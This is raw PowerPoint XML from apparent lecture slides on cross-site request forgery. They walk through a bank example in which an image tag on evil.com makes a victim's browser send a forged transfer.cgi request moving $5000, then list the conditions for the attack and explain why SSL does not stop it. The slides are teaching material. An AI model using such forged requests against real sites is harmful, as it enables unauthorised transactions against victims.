        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12318" name="Line 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3024" y="2304"/>
              <a:ext cx="1776" cy="14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en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40991" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3120" y="2208"/>
              <a:ext cx="1584" cy="3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70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>POST/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>transfer.cgi?</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>from</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>= 314159265&amp;to</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>01123581&amp;amount=5000 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58517" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11015699" y="5420926"/>
            <a:ext cx="1867224" cy="78482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39" tIns="65020" rIns="130039" bIns="65020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lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ransfer.cgi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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6827520" y="6719147"/>
            <a:ext cx="4009813" cy="2600959"/>
            <a:chOff x="3024" y="2976"/>
            <a:chExt cx="1776" cy="1152"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12315" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3024" y="2976"/>
              <a:ext cx="1776" cy="20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 type="arrow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en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40988" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3103" y="3021"/>
              <a:ext cx="1584" cy="3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70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>GET/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>transfer.cgi?</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>from</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>= 314159265&amp;to=01123581&amp;amount=5000 </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12317" name="AutoShape 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3281" y="3552"/>
              <a:ext cx="1375" cy="576"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20546"/>
                <a:gd name="adj2" fmla="val -78819"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1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lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-CA" sz="2000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>The image-tag from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-CA" sz="2000" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>evil.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-CA" sz="2000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> forces a FORGED GET request to be sent to Bank by victim’s browser.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258529" name="AutoShape 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9317850" y="690882"/>
            <a:ext cx="3145084" cy="1043093"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28750"/>
              <a:gd name="adj2" fmla="val 254524"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3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130039" tIns="65020" rIns="130039" bIns="65020"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Transfer funds from one account to another</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0D0D"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12309" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10894888" y="3833707"/>
            <a:ext cx="1944216" cy="827069"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 28569"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DDDDD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30039" tIns="65020" rIns="130039" bIns="65020" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ransfer.cgi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12310" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10257087" y="2384214"/>
            <a:ext cx="2178256" cy="500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39" tIns="65020" rIns="130039" bIns="65020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 dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Webbank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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93999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85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A3EDDC-6591-914B-8867-1A9A8997D2E5}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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-12700" y="0"/>
            <a:ext cx="13017500" cy="1708448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5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What can we Learn from the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> CSRF Bank Attack Example?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381720" y="1852464"/>
            <a:ext cx="12241360" cy="7416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457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>CSRF attack: When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>a malicious website causes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>browser to perform unwanted actions on a trusted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A40800"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Necessary condition for attack to take place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="2700" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>The user must be capable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>of executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>“unwanted” actions on trusted website, i.e., have implicit authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="2700" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>The trusted website only checks that an action came from an authenticated user’s browser, and not the user itself (i.e., no way to check if user authorized the action)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buSzPct val="155000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endParaRPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="2700" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>The user must be social-engineered to visit malicious website during the authenticated session with the trusted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="2700" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>In this particular example, the attacker had to know the “from” account number as well</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36858865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A3EDDC-6591-914B-8867-1A9A8997D2E5}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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-12700" y="0"/>
            <a:ext cx="13017500" cy="1708448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5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can the use of SSL prevent CSRF?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381720" y="1852464"/>
            <a:ext cx="12241360" cy="7416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457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Not necessarily</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="A40800"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A40800"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Goes back to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>implicit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="2700" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>The user’s browser records session information when she is connected to trusted site the first time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="2700" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Any subsequent requests sent by the browser are “helpfully” appended with session information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="2700" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Username, password, or SSL certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="2700" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Hence, SSL does not necessarily protect the user against CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="2700" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>A sure shot way is for the user to authenticate every request. No implicit authentication. Such an approach will make browsers unusable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41628492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A3EDDC-6591-914B-8867-1A9A8997D2E5}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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-12700" y="0"/>
            <a:ext cx="13017500" cy="1708448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5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST request-based CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
